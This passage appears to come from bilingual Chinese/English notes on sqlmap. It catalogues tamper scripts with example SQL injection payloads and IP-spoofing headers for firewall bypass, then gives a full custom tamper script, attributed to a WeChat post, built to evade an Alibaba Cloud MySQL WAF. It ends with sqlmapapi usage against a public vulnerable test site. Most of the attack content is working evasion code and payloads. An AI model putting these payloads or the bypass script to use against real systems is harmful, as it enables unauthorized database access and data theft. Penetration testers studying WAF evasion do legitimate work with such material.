Replaces instances of UNION ALL SELECT with UNION SELECT counterpart

将 union all select 替换成 union select

>>> tamper('-1 UNION ALL SELECT')
'-1 UNION SELECT'

unmagicquotes.py

Replaces quote character (') with a multi-byte combo %BF%27 together with generic comment at the end (to make it work)

用多字节组合 %BF%27 代替引号字符(')，并在结尾处加上通用注释(以使其发挥作用)

Reference:

http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string

>>> tamper("1' AND 1=1")
'1%bf%27-- -'

uppercase.py

Replaces each keyword character with upper case value (e.g. select -> SELECT)

将关键字符替换成大写

Tested against:

Microsoft SQL Server 2005
MySQL 4, 5.0 and 5.5
Oracle 10g
PostgreSQL 8.3, 8.4, 9.0

>>> tamper('insert')
'INSERT'

varnish.py

Appends a HTTP header 'X-originating-IP' to bypass Varnish Firewall

附加一个HTTP头来 X-originating-IP = "127.0.0.1" 来绕过防火墙

Reference:

https://web.archive.org/web/20160815052159/http://community.hpe.com/t5/Protect-Your-Assets/Bypassing-web-application-firewalls-using-HTTP-headers/ba-p/6418366

Examples:

>> X-forwarded-for: TARGET_CACHESERVER_IP (184.189.250.X)
>> X-remote-IP: TARGET_PROXY_IP (184.189.250.X)
>> X-originating-IP: TARGET_LOCAL_IP (127.0.0.1)
>> x-remote-addr: TARGET_INTERNALUSER_IP (192.168.1.X)
>> X-remote-IP: * or %00 or %0A

versionedkeywords.py

Encloses each non-function keyword with (MySQL) versioned comment

Requirement:

MySQL

Tested against:

MySQL 4.0.18, 5.1.56, 5.5.11

>>> tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#')
'1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#'

versionedmorekeywords.py

Encloses each keyword with (MySQL) versioned comment

Requirement:

MySQL >= 5.1.13

Tested against:

MySQL 5.1.56, 5.5.11

>>> tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#')
'1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#'

xforwardedfor.py

Append a fake HTTP header 'X-Forwarded-For' (and alike)

附加多个虚假的 HTTP 头

headers["X-Forwarded-For"] = randomIP()
headers["X-Client-Ip"] = randomIP()
headers["X-Real-Ip"] = randomIP()
headers["CF-Connecting-IP"] = randomIP()
headers["True-Client-IP"] = randomIP()
headers["Via"] = "1.1 Chrome-Compression-Proxy"
headers["CF-IPCountry"] = random.sample(('GB', 'US', 'FR', 'AU', 'CA', 'NZ', 'BE', 'DK', 'FI', 'IE', 'AT', 'IT', 'LU', 'NL', 'NO', 'PT', 'SE', 'ES', 'CH'), 1)[0]

bypass

来自 : https://mp.weixin.qq.com/s/vjbQT41O4MSPoZY9fej_cw

#!/usr/bin/env python2
#user by: XG

import re
from lib.core.data import kb
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

def dependencies():
    pass

def tamper(payload, **kwargs):
    retVal = payload
    if payload:
        # ALiYun mysql
        # index.php?id=336699dfg

        retVal = re.sub(r" ", "%20", retVal)
        retVal = re.sub(r"\'\)%20AND%20", "%27%29%2f%2a%20%30%30%7d%7d%29%5d%5b%2a%2f%0d%0a%20%2d%2d%20%5d%5b%81%20%0d%0aAND%0d%0a%20%2d%2d%20%5d%5b%81%20%0d%0a", retVal)
        retVal = re.sub(r"\)%20AND%20", "%29%2f%2a%30%30%7d%7d%29%5d%5b%2a%2f%0d%0a%20%2d%2d%20%5d%5b%81%20%0d%0aAND%0d%0a%20%2d%2d%20%5d%5b%81%20%0d%0a", retVal)
        retVal = re.sub(r"\'%20AND%20", "%27%20%0d%0a%20%2d%2d%20%5d%5b%81%20%0d%0aAND%0d%0a%20%2d%2d%20%5d%5b%81%20%0d%0a", retVal)
        retVal = re.sub(r"%20AND%20", "%0d%0a%20%2d%2d%20%5d%5b%81%20%0d%0aAND%0d%0a%20%2d%2d%20%5d%5b%81%20%0d%0a", retVal)
        retVal = re.sub(r"%20OR%20NOT%20", "%0d%0a%20%2d%2d%20%5d%5b%81%20%0d%0aOR%20NOT%0d%0a%20%2d%2d%20%5d%5b%81%20%0d%0a", retVal)
        retVal = re.sub(r"%20OR%20", "%0d%0a%20%2d%2d%20%5d%5b%81%20%0d%0aOR%0d%0a%20%2d%2d%20%5d%5b%81%20%0d%0a", retVal)
        retVal = re.sub(r"=", "%0d%0a%20%2d%2d%20%5d%5b%81%20%0d%0aLIKE%0d%0a%20%2d%2d%20%5d%5b%81%20%0d%0a", retVal)
        retVal = re.sub(r"\'%20UNION", "%27%0d%0a%20%2d%2d%20%5d%5b%81%20%0d%0aUNION", retVal)
        retVal = re.sub(r"UNION%20SELECT%20", "UNION%0d%0a%20%2d%2d%20%81/*%99%20%0d%0a%0d%0a%0d%0aSELECT%0d%0a%20%2d%2d%20%81/*%99%0d%0a%0d%0a", retVal)
        retVal = re.sub(r"UNION%20ALL%20SELECT%20", "UNION%0d%0a%20%2d%2d%20%81/*%99%20%0d%0a%0d%0a%0d%0aALL%20SELECT%0d%0a%20%2d%2d%20%81/*%99%0d%0a%0d%0a", retVal)
        retVal = re.sub(r"%20FROM", "%0d%0a%20%2d%2d%20%87%0d%0aFROM", retVal)
        retVal = re.sub(r"FROM%20INFORMATION_SCHEMA\.", "FROM%0d%0a%20%2d%2d%20%5d%5b%81%20%0d%0aINFORMATION_SCHEMA%0d%0a.", retVal)
        retVal = re.sub(r"CASE%20", "CASE%0D%0A%0d%2d%2d%20%99%29%20%0d%0a", retVal)
        retVal = re.sub(r"THEN%20", "THEN%0D%0A%0d%2d%2d%20%99%29%20%0d%0a", retVal)
        retVal = re.sub(r"ELT\(", "ELT%20%2d%2d%20%29%29%29%29%29%29%0d%0a%28", retVal)
        #retVal = re.sub(r"\(SELECT%20", "%28%20%2d%2d%0d%99%20%0d%0aSELECT%0D%0A%0d%2d%2d%20%99%29%20%0d%0a", retVal)
        #retVal = re.sub(r"\(SELECT%20", "%28%20%2d%2d%0d%99%5b%5d%20%0d%0aSELECT%0D%0A%0d%2d%2d%20%99%29%20%0d%0a", retVal)
        retVal = re.sub(r"\(SELECT%20", "%28%20%20%23%20%2f%2a%99%29%5d%5b%7b%7d%23%5b%5d%0aSELECT%20", retVal)
        retVal = re.sub(r"SELECT%20\(", "SELECT%20%2d%2d%20%29%29%29%5b%5d%7b%7d%0d%0a%28", retVal)
        retVal = re.sub(r"CONCAT\(", "CONCAT%20%23%20%89%0d%0a%28", retVal)
        retVal = re.sub(r"CHR\(", "CHR%20%2d%2d%20%29%29%29%29%5b%5d%7b%7d%0d%0a%28", retVal)
        retVal = re.sub(r"CHAR\(", "CHAR%20%2d%2d%20%29%29%29%29%5b%5d%7b%7d%0d%0a%28", retVal)
        retVal = re.sub(r"EXTRACTVALUE\(", "EXTRACTVALUE%20%23%20%89%0d%0a%28", retVal)

        #retVal = re.sub(r"%20INFORMATION_SCHEMA", "%20/*like%22%0d%0a%20%2d%2d%20%0d%22*/%20%0d%0a%20INFORMATION_SCHEMA%0d%0a", retVal)

    return retVal

ACCESS

相关文章

API接口

相关文章

使用方式

python3 sqlmapapi.py -s -H 0.0.0.0  # 开启服务端,监听本地 8775 端口

开启服务端后我们可以访问 url 进行调用，也可以在命令行进行调用

python3 sqlmapapi.py -c             # 默认连接本机的 api

没有问题就可以进入我们的命令行了

命令行下可以使用以下命令

help           显示帮助信息
new ARGS       开启一个新的扫描任务 (e.g. 'new -u "http://testphp.vulnweb.com/artists.php?artist=1"')
use TASKID     切换taskid (e.g. 'use c04d8c5c7582efb4')
data           获取当前任务返回的数据
log            获取当前任务的扫描日志
status         获取当前任务的扫描状态
option OPTION  获取当前任务的选项
options        获取当前任务的所有配置信息
stop           停止当前任务
kill           杀死当前任务
list           显示所有任务列表
version        查看版本信息
flush          清空所有任务
exit           退出客户端

开始扫描新的任务

new -u 'http://testphp.vulnweb.com/artists.php?artist=1'

可以看到已经切换到我们这个任务的 ID.

每一个任务只能是一个单独测试点，每个任务对应一个 ID

创建成功后就会这样，之后我们可以通过输入 status 来获取当前的一个运行情况

status

SQLMAP API 扫描完成后，不会进行主动推送完成信息

returncode 如果返回的是 0，那么我们的注入就是成功的。我们可以输入 data 来获取我们的详细的信息。

data

返回的数据都是 JSON 格式的数据

PreviousSnort NextSuricata